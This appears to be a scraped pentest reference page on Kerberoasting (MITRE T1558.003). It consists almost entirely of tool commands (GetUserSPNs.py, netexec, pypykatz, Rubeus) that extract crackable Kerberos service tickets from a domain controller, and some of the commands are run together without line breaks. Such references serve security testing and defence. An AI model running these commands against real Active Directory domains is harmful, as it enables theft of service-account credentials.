Kerberoast
MITRE ATT&CK™ Sub-technique T1558.003
Theory
Practice
# with a password
GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'
# with an NT hash
GetUserSPNs.py -outputfile kerberoastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'netexec ldap $TARGETS -u $USER -p $PASSWORD --kerberoasting kerberoastables.txt --kdcHost $KeyDistributionCenterpypykatz kerberos spnroast -d $DOMAIN -t $TARGET_USER -e 23 'kerberos+password://DOMAIN\username:Password@IP'Rubeus.exe kerberoast /outfile:kerberoastables.txtKerberoast w/o pre-authentication
Targeted Kerberoasting
Resources
Last updated
Was this helpful?